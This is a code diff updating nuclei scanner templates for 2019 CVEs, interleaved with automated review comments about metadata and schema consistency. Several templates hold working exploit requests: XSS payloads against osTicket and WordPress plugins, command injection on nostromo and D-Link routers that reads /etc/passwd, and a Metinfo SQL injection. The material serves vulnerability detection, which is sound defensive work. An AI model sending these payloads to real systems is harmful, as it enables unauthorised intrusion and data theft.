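Review bot: The hunk removes `cookie-reuse: true` from a two-step flow whose `GET /custom/ajax_download.php?...` request only succeeds inside the session created by the `POST /interface/main/main_screen.php` login; with the `http:` protocol introduced in the previous hunk the engine presumably keeps cookies by default unless `disable-cookie: true` is set, so the removal is consistent, but it makes the template silently depend on an engine version with that default. A one-line comment above the raw block, `# session cookies are carried over by the http protocol's default cookie jar; do not add disable-cookie`, would record the dependency for the next maintainer. Swapping the order of the `regex` and `header` matchers in the same hunk is cosmetic and could have been left out of a hunk that also changes behaviour.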
@@ -1,71 +1,88 @@ -id: CVE-2019-14750 - -info: - name: osTicket < 1.12.1 - Cross-Site Scripting - author: TenBird - severity: medium - description: | - An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. - reference: - - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-14750 - classification: - cve-id: CVE-2019-14750 - metadata: - max-request: 4 - shodan-query: title:"osTicket" - tags: cve,cve2019,osticket,xss,intrusive - -requests: - - raw: - - | - POST /upload/setup/install.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - s=install&name=test&email=test%40test.com&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email=test222%40test.com&username=test&passwd=asdf1234&passwd2=asdf1234&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo - - - | - GET /upload/scp/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - | - POST /upload/scp/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - __CSRFToken__={{csrftoken}}&do=scplogin&userid=test&passwd=asdf1234&ajax=1 - - - | - GET /upload/scp/settings.php HTTP/1.1 - Host: {{Hostname}} - - redirects: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body_4 - words: - - '' - - 'getConfig().resolve' - condition: and - - - type: word - part: header_4 - words: - - text/html - - - type: status - status: - - 200 - - extractors: - - 
type: regex - name: csrftoken - part: body - group: 1 - regex: - - '__CSRFToken__" value="(.*?)"' - internal: true +id: CVE-2019-14750 + +info: + name: osTicket < 1.12.1 - Cross-Site Scripting + author: TenBird + severity: medium + description: | + An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade osTicket to version 1.12.1 or later to mitigate this vulnerability. + reference: + - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-14750 + - http://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html + - https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12 + - https://github.com/osTicket/osTicket/releases/tag/v1.10.7 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14750 + cwe-id: CWE-79 + epss-score: 0.05107 + epss-percentile: 0.92161 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + vendor: osticket + product: osticket + shodan-query: title:"osTicket" + tags: cve,cve2019,packetstorm,osticket,xss,intrusive +variables: + user_name: "{{to_lower(rand_text_alphanumeric(6))}}" + user_pass: "{{rand_text_alphanumeric(12)}}" + user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" + +http: + - raw: + - | + POST /upload/setup/install.php HTTP/1.1 + Host: 
{{Hostname}} + Content-Type: application/x-www-form-urlencoded + + s=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo + - | + GET /upload/scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + POST /upload/scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1 + - | + GET /upload/scp/settings.php HTTP/1.1 + Host: {{Hostname}} + + redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_4 + words: + - '' + - 'getConfig().resolve' + condition: and + + - type: word + part: header_4 + words: + - text/html + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true +# digest: 4a0a004730450221009eeb1aecb7f7ee802cfd019bdbb9f81f98886ef6692f3c8883999696d0f6b8e302201d37fff5e31a6f4d57613523ed67d21d2c9c7c50cbb556cfe44e0907928f1003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14789.yaml b/nuclei-templates/CVE-2019/CVE-2019-14789.yaml index aae23290ec..66a4abe1ab 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-14789.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-14789.yaml 
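Review bot: In the new `variables:` block `user_email` is built from `{{username}}`, which in the same request is the externally supplied database user (`dbuser={{username}}`), while `user_name` and `user_pass` hold the randomised account values; this looks like a typo for `user_email: "{{user_name}}@{{to_lower(rand_text_alphanumeric(6))}}.com"`. As written, the install form's `email` and `admin_email` fields depend on a command-line variable unrelated to the created account and stay unresolved when no `username` value is supplied. The `reference` list now carries the Packetstorm article twice (`https://` and `http://`); drop one. This hunk spans the whole file (lines 1–88) and, like CVE-2019-14530, drops `cookie-reuse: true` in favour of the `http:` protocol's default cookie handling, which is worth confirming.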
@@ -6,6 +6,8 @@ info: severity: medium description: | Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability. reference: @@ -19,7 +21,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46773 + epss-percentile: 0.46015 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss + tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar http: - raw: @@ -48,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Custom 404 Pro")' condition: and -# digest: 4b0a00483046022100f0b6554e6dd347b97a9cd76dccaa2cd3b7612474b89aa3bf1caf831ec333f152022100cd3d47f09ae415bba2e750139bf6dee7b5183c57a2306d22fc9376a169e49b47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f868cbc5ff74801e824e4721f229eb4edaebfaefdde075bae4c07c4d2123145202202a8a32c4eb6a0c0c1683beb54270a0af67a0d0aa825c5c2043739a93cb305c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-14974.yaml b/nuclei-templates/CVE-2019/CVE-2019-14974.yaml deleted file mode 100644 index 3549909156..0000000000 
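Review bot: The remediation line in this hunk still reads `Update to Custom 404 Pro version 3.2.8 or later`, which contradicts the description's `before 3.2.9` and the cpe entry that pins 3.2.8 as an affected version; the added `impact` block sits directly above it, so this is the place to reconcile them, presumably to `Update to Custom 404 Pro version 3.2.9 or later`. The same description/remediation mismatch is carried forward by the CVE-2019-15642 hunk (`through 1.920` affected versus `Upgrade Webmin to version 1.920 or later`) and the CVE-2019-17574 hunk (`before 1.8.13` versus `1.8.12 or later`). A remediation field that names a still-affected release misleads anyone triaging a finding, so these should be checked against the vendor advisories rather than copied through by the sync.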
--- a/nuclei-templates/CVE-2019/CVE-2019-14974.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2019-14974 - -info: - name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting - author: madrobot - severity: low - -requests: - - method: GET - path: - - "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "url = window.location.search.split(\"?desktop_url=\")[1]" - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-15107.yaml b/nuclei-templates/CVE-2019/CVE-2019-15107.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15107.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15107.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15501.yaml b/nuclei-templates/CVE-2019/CVE-2019-15501.yaml index aa65b25dac..e2ea1d72f4 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15501.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15501.yaml @@ -1,4 +1,5 @@ id: CVE-2019-15501 + info: name: LSoft ListServ - XSS author: LogicalHunter @@ -14,20 +15,24 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 description: "Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter." + requests: - method: GET path: - '{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - '' part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-15642.yaml b/nuclei-templates/CVE-2019/CVE-2019-15642.yaml index c536939b59..092de77f40 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15642.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15642.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users." + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. remediation: | Upgrade Webmin to version 1.920 or later to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-15642 cwe-id: CWE-94 - epss-score: 0.26994 - epss-percentile: 0.96292 + epss-score: 0.22278 + epss-percentile: 0.9605 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: verified: true @@ -79,4 +81,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cfa0d3124a91d441f75609b2eaa4fbc39e7e8e2663ca2510935b99d0e921076802210095ccb298220471e14675492922192eaad694ae301df960dfe525e7279f35413a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203340b3245dd51d9b67c6f29e2eb95aa3da0875247e28110b582812e96814346302200db80c14d3d510ec344719ffefd2e392bb9316a3d49a3d4e3aae41b95b77c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-15829.yaml b/nuclei-templates/CVE-2019/CVE-2019-15829.yaml index 737491a261..fd23065c70 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15829.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15829.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15829 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50433 + epss-percentile: 0.50525 cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -28,7 +28,7 @@ info: product: gallery_photoblocks framework: wordpress publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" - tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan + tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs http: - raw: @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "post galleries!")' condition: and -# digest: 4a0a00473045022100bcd420c86f0d3bb857c91e052a02f49bd5de98c99032903a056ff89379c35f1602204b6fc7af4b181c1a5e3ca8fc6ec406e1407a1dc9f53bb819d9f6b58808620105:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205217fa5d440959f2c80a587abe7bebae86cb1964d9c81277de7f8ce83833bfee02202d3d0b408e755ad0ecb80c3a9827a8c06a6c187d00b50e6c01451d50ac04f735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-15858.yaml b/nuclei-templates/CVE-2019/CVE-2019-15858.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15858.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15858.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15859.yaml b/nuclei-templates/CVE-2019/CVE-2019-15859.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15859.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15859.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15889.yaml b/nuclei-templates/CVE-2019/CVE-2019-15889.yaml index 3934366787..66a57ec7c5 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-15889.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-15889.yaml 
@@ -1,24 +1,37 @@ id: CVE-2019-15889 + info: name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 + - https://www.cybersecurity-help.cz/vdb/SB2019041819 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15889 + cwe-id: CWE-79 + requests: - method: GET path: - '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc' + matchers-condition: and matchers: - type: word words: - "" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-16057.yaml b/nuclei-templates/CVE-2019/CVE-2019-16057.yaml index ff13697fe1..9838f0edb4 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16057.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16057.yaml 
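Review bot: `cvss-score: 6.10` in the new classification block carries a trailing zero while the other templates in this patch write the bare value (`cvss-score: 6.1`), and the block is inserted after `tags:` whereas the sibling templates keep `tags` as the last key under `info`; both are worth aligning before a digest is generated for this file. The new `description` says `before 2.9.94` while `name` still says `2.9.93`, which is consistent but reads more clearly as `Download Manager < 2.9.94`. The words matcher further down shows as `- ""` in this view; if the on-disk file really matches the empty string, the template fires on any HTML 200 and the expected marker should be restored, so that line is worth checking.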
@@ -6,18 +6,22 @@ info: severity: critical description: | The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-16057 - https://web.archive.org/web/20201222035258im_/https://blog.cystack.net/content/images/2019/09/poc.png - https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors + - https://github.com/Z0fhack/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-16057 cwe-id: CWE-78 - epss-score: 0.97548 + epss-score: 0.9754 epss-percentile: 0.99994 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: @@ -39,4 +43,4 @@ http: - status_code == 200 - contains_all(body, "uid=", "gid=", "pwd&id") condition: and -# digest: 4b0a00483046022100ea69902730e5f98ffe759136a914a2c342ef58a6b6d2f50f48629ae4829d1311022100ee181832eb5be95eed8bf936f0378525a8e10c82f941a5eedd34f11ea4418b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d92a0801c2f43788aed32ed75ef458b62aca7e252963f4eb1fcc936afa07554022100df7afc1ba5725bcfdeb382cf89b08067d8bd2758da7a241b7e2de0eb9c038da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-16097.yaml b/nuclei-templates/CVE-2019/CVE-2019-16097.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16097.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16097.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16278.yaml b/nuclei-templates/CVE-2019/CVE-2019-16278.yaml index 8b7971674f..ca568b2722 100644 
--- a/nuclei-templates/CVE-2019/CVE-2019-16278.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16278.yaml @@ -1,29 +1,29 @@ -id: CVE-2019-16278 - -info: - author: pikpikcu - name: nostromo 1.9.6 - Remote Code Execution - severity: critical - reference: https://www.exploit-db.com/raw/47837 - tags: cve,cve2019,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-16278 - cwe-id: CWE-22 - description: "Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request." - -requests: - - raw: - - | - POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 - Host: {{Hostname}} - - echo - echo - cat /etc/passwd 2>&1 - - matchers: - - type: regex - regex: +id: CVE-2019-16278 + +info: + author: pikpikcu + name: nostromo 1.9.6 - Remote Code Execution + severity: critical + reference: https://www.exploit-db.com/raw/47837 + tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + description: "Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request." + +requests: + - raw: + - | + POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 + Host: {{Hostname}} + + echo + echo + cat /etc/passwd 2>&1 + + matchers: + - type: regex + regex: - "root:.*:0:0:" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-16313.yaml b/nuclei-templates/CVE-2019/CVE-2019-16313.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16313.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16313.yaml 
diff --git a/nuclei-templates/CVE-2019/cve-2019-1653.yaml b/nuclei-templates/CVE-2019/CVE-2019-1653.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-1653.yaml rename to nuclei-templates/CVE-2019/CVE-2019-1653.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16662.yaml b/nuclei-templates/CVE-2019/CVE-2019-16662.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16662.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16662.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16759.yaml b/nuclei-templates/CVE-2019/CVE-2019-16759.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16759.yaml rename to nuclei-templates/CVE-2019/CVE-2019-16759.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16920.yaml b/nuclei-templates/CVE-2019/CVE-2019-16920.yaml index f950571c5f..c45dc73829 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16920.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16920.yaml 
@@ -1,57 +1,53 @@ id: CVE-2019-16920 + info: name: Unauthenticated Multiple D-Link Routers RCE author: dwisiswant0 severity: critical description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. - # References: -# - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 requests: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 + Referer: {{BaseURL}} + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 + 
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or + part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml b/nuclei-templates/CVE-2019/CVE-2019-16931.yaml index 8249ceebfa..7cccc93c52 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16931.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: wp-plugin,wordpress,wp,xss,unauth + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth requests: - raw: - | diff --git a/nuclei-templates/CVE-2019/CVE-2019-16996.yaml b/nuclei-templates/CVE-2019/CVE-2019-16996.yaml index 83afea932a..8795cf7fef 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-16996.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-16996.yaml 
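Review bot: The rewritten `reference:` is a bare scalar (`reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r`) while every other template touched in this patch uses a list under `reference:`, and `tags` now sits before `classification` rather than as the last key of `info`; the new side also loses the file's trailing newline (`\ No newline at end of file` after `- 200`). Suggest `reference:` followed by `- https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r` as a list item and restoring the final newline. The relaxed matcher `root:.*:0:0:` with `part: body` is the form the other templates here use, so that part of the change looks right. The hunk spans the whole file, so nothing is cut off.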
@@ -1,50 +1,32 @@ id: CVE-2019-16996 - info: name: Metinfo 7.0.0 beta - SQL Injection author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2019-16996 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-16996 cwe-id: CWE-89 - epss-score: 0.33595 - epss-percentile: 0.96956 - cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: metinfo - product: metinfo - tags: cve2019,cve,metinfo,sqli - -http: + tags: metinfo,sqli,cve,cve2019 +requests: - method: GET path: - "{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23" - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - "1918835981" - - type: status status: - 200 -# digest: 4b0a00483046022100d7c28728a16c6d6e124df1e88628cfc2b4a62f577db56098997dd65775268ecf022100fb9bfc9e783a86672f070c74024492b2208acb2d01587036674ce8794fb3fc6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/14 
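Review bot: This hunk moves CVE-2019-16996 backwards: it drops the `impact`/`remediation` text, the `epss`/`cpe`/`metadata` fields and the `# digest:` trailer, and swaps `http:`/`host-redirects:` back to the legacy `requests:`/`redirects:` keys, while the CVE-2019-17418 hunk in the same patch makes exactly the opposite change on its sibling MetInfo template. That looks like the auto-sync picking the older copy of this file rather than an intentional edit; the two templates should end up on the same schema, with `http:` and `host-redirects: true` being the newer form. Removing `# digest:` also leaves this template without the signature trailer the other updated files carry, so any consumer that verifies template signatures will treat it differently from its siblings.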
diff --git a/nuclei-templates/CVE-2019/cve-2019-17270.yaml b/nuclei-templates/CVE-2019/CVE-2019-17270.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17270.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17270.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17382.yaml b/nuclei-templates/CVE-2019/CVE-2019-17382.yaml deleted file mode 100644 index ac042ce6fc..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17382.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: CVE-2019-17382 -info: - name: Zabbix Authentication Bypass - author: Harsh Bothra - severity: Critical - # source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382 -requests: - - method: GET - path: - - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Dashboard" diff --git a/nuclei-templates/CVE-2019/CVE-2019-17418.yaml b/nuclei-templates/CVE-2019/CVE-2019-17418.yaml index 86a6c43174..ad40388cd6 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-17418.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-17418.yaml 
